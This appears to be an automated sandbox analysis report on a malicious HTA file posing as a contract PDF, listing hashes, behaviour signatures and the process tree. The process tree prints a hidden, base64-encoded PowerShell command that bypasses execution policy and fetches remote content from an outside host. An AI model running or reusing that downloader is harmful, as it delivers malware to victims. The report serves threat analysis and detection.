Analysis

  • max time kernel
    891s
  • max time network
    893s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    27-03-2023 18:41

General

  • Target

    _43234355_Contract_of_Sale_pdf.hta

  • Size

    840B

  • MD5

    6a8c611062057298887c83ccfe702a15

  • SHA1

    8c3023a178c326d9da94273f6dfe62c73ca07f96

  • SHA256

    27c34ef5f274515bb252b5e52c009260764918de9b44ef8a1eb549f221f66075

  • SHA512

    c562f01f83fbc88f2b4f1177ebcba5ee1a1b752ab7ff94f910d064a4f6d012872496b2082f1bd1d8446b4c5e166bc6e7cdc35c98220742703ee4e30878896133

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\_43234355_Contract_of_Sale_pdf.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:912
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -WindowStyle Hidden -NonInteractive -NoProfile -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBQACAAQgB5AHAAYQBzAHMAIAAtAE4AbwBQAHIAbwBmAGkAbABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AYwAgACgASQAnAHcAJwByACgAJwBoAHQAdABwAHMAOgAvAC8AZwBnAGQAdAAuAHgAeQB6AC8AdwBpAG4AZABvAHcAcwAvAGYAaQBsAGUALgB0AHgAdAAnACkAKQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1756

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1756-57-0x0000000002360000-0x00000000023A0000-memory.dmp
    Filesize

    256KB

  • memory/1756-58-0x0000000002360000-0x00000000023A0000-memory.dmp
    Filesize

    256KB